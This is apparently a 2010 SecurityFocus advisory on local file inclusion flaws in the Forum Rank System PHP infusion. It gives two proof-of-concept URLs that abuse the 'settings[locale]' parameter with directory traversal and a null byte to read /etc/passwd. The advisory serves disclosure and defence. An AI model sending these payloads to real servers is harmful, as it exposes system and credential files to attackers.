Forum Rank System 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/infusions/rank_system/forum.php?settings[locale]=../../../../../../../../etc/passwd%00
http://www.example.com/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus